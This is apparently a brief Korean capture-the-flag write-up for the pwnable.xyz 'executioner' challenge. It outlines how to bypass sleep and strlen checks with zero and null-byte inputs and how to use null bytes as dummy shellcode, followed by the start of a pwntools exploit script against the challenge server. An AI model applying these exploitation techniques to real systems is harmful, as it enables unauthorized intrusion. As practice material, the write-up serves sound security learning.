War Games/pwnable.*
[ pwnable.xyz ] executioner
1. sleep --> 0을 줘서 sleep(0)으로 만듬 2. strlen() --> 첫 byte "\x00"을 줌 3. "\x00"*2 --> add BYTE [rax], al그냥 dummy shellcode로 준다. from pwn import * context.log_level='debug' context.arch='amd64' def debug(): log.critical(f"pid= {pidof(p)[0]}") pause() #p=process("./challenge") p=remote("svc.pwnable.xyz",30025) p.recvuntil("= ") a=int(p.recvline()[:-1],16) p.sendlineafter(">",str(0)+" "+str(a)) debug()..